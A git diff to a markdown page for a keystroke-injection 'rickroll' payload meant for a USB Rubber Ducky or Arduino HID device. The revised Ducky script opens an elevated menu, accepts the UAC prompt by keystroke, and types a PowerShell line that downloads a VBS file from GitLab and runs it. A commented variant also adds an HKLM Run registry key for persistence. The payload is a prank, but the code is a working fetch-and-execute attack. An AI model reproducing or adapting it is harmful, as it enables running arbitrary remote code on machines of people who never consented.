diff --git a/Payload---rickroll.md b/Payload---rickroll.md index 27357dd..ac0237b 100644 --- a/Payload---rickroll.md +++ b/Payload---rickroll.md @@ -2,12 +2,16 @@ GitLab repo: https://gitlab.com/WarKitteh/arduino-hid-rickroll Ducky code: `DELAY 1000 -GUI r -DELAY 100 -STRING cmd -DELAY 100 +GUI x +DELAY 200 +UP +REPEAT 7 +DELAY 200 ENTER -DELAY 100 -STRING powershell (new-object System.Net.WebClient).DownloadFile('https://pixelcoding.nl/download/rickroll.vbs','%TEMP%\rickroll.vbs'); && start %TEMP%\rickroll.vbs && exit -DELAY 100 +DELAY 500 +ALT y +DELAY 200 +STRING powershell (new-object System.Net.WebClient).DownloadFile('https://gitlab.com/WarKitteh/arduino-hid-rickroll/raw/cee63bb220c856587462b29d61bdfc70c806805f/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && exit +REM powershell (new-object System.Net.WebClient).DownloadFile('https://gitlab.com/WarKitteh/arduino-hid-rickroll/raw/cee63bb220c856587462b29d61bdfc70c806805f/rickroll.vbs','%userprofile%\rickroll.vbs'); && start %userprofile%\rickroll.vbs && reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v TotallyNotShadyStartupItem /d %userprofile%\rickroll.vbs && exit +DELAY 200 ENTER` \ No newline at end of file